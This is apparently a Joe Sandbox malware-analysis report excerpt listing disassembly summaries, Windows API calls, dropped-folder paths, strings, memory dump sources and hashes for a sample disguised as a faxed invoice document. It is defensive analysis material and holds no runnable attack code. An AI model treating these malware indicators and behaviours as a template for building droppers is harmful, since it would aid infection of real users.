                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes,?,00000000,000000F0), ref: 0040164D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes, xrefs: 00401640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes
                                                                                              • API String ID: 1892508949-3326558002
                                                                                              • Opcode ID: 0e7b7a5ff7d9ce17ca4bd7bd6c8f30496ccefbc3263a2f90dcc7a95e65e19aa8
                                                                                              • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                              • Opcode Fuzzy Hash: 0e7b7a5ff7d9ce17ca4bd7bd6c8f30496ccefbc3263a2f90dcc7a95e65e19aa8
                                                                                              • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 786 406536-406568 call 4064d5 789 4065a6 786->789 790 40656a-406598 RegQueryValueExW RegCloseKey 786->790 792 4065aa-4065ac 789->792 790->789 791 40659a-40659e 790->791 791->792 793 4065a0-4065a4 791->793 793->789 793->792
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040679D,80000002), ref: 0040657C
                                                                                              • RegCloseKey.KERNELBASE(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Spiltovene16), ref: 00406587
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID: : Completed
                                                                                              • API String ID: 3356406503-2954849223
                                                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Spiltovene16,004030A8,004030A8,Spiltovene16,00000000,00000000,00000000), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Spiltovene16,Spiltovene16), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 334405425-0
                                                                                              • Opcode ID: 6423cf9320f7f2b343ca29c0fc8197504ddffcda709cb6cb932168f6e33a1d5b
                                                                                              • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                              • Opcode Fuzzy Hash: 6423cf9320f7f2b343ca29c0fc8197504ddffcda709cb6cb932168f6e33a1d5b
                                                                                              • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                              • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
